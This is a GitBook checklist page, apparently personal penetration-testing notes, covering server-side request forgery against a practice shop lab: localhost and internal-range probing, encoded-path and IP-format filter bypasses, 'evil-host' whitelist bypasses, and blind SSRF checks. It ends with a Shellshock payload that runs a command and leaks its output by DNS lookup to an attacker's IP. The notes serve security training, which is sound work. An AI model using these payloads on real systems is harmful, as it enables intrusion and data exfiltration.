Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. Checklists

SSRF

PRACTICE ! PRACTICE ! PRACTICE !

Check for any API's, which fetches information from backend to the front

-> Tamper them stockAPI=https://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1 stockAPI=http://127.0.0.1/admin

  • Find any internal services running in the 192.168.0.x series, and then try accessing the /admin url use Burp intruder to find the x

  • stockAPI=http://127.0.0.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65 <- (admin) Double encoded

  • Replace 127.0.0.1 as : 2130706433, 017700000001, 127.1

  • Whitelist Bypasses : https://website.com@evil-host https://evil-host#website.com https://evil-host.website.com https://evil-host#@website.com

  • We can URL encode upto 3 times for a 200 status code.

  • Analyze the API which fetches the data of that product -> If it doesnt connect to the external service and displays only the path then visit the next product / any option which takes us to the next product in that page -> this will surely reveal the path and we can try open-redirection.

Blind SSRF

  • If nothing works then try tampering the "Referrer header" with the Burp collab public server to get a ping back from the remote host which confirms there is a Blind SSRF.

  • Tamper the "User-agent" parameter by inserting the shellshock payload and modify the Referrer header to connect it with the remote host using Burp collab client

() { :;}; /usr/bin/nslookup $(whoami).Attacker's IP
PreviousLocal File InclusionNextXXE Attacks

Last updated 2 years ago